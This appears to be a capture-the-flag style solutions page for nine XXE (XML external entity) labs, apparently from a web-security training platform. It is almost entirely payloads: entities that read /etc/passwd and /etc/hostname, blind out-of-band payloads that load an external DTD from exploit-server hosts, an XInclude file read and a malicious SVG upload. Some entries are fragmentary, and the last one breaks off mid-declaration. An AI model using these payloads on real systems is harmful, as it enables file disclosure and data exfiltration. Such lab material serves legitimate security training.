burp-xxe
burp_xxe
level 1 Exploiting XXE using external entities to retrieve files
1 | <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck> |
level 2 Exploiting XXE to perform SSRF attacks
1 | <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck> |
level 3 Blind XXE with out-of-band interaction
1 | <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck> |
level 4 Blind XXE with out-of-band interaction via XML parameter entities
1 | <stockCheck><productId>1</productId><storeId>1</storeId></stockCheck> |
level 5 Exploiting blind XXE to exfiltrate data using a malicious external DTD
1 | <!ENTITY % file SYSTEM "file:///etc/hostname"> |
1 | <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aad004b035681db811da27d01c20084.exploit-server.net/exploit.dtd"> %xxe;]><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck> |
level 6 Exploiting blind XXE to retrieve data via error messages
1 | <!ENTITY % file SYSTEM "file:///etc/passwd"> |
1 | <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a7e00cb043ec7848335a00e018c00e9.exploit-server.net/exploit"> %xxe;]><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck> |
level 7 Exploiting XInclude to retrieve files
1 | <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo> |
level 8 Exploiting XXE via image file upload
1 | <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg> |
level 9 Exploiting XXE to retrieve data by repurposing a local DTD
1 | <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE message [ |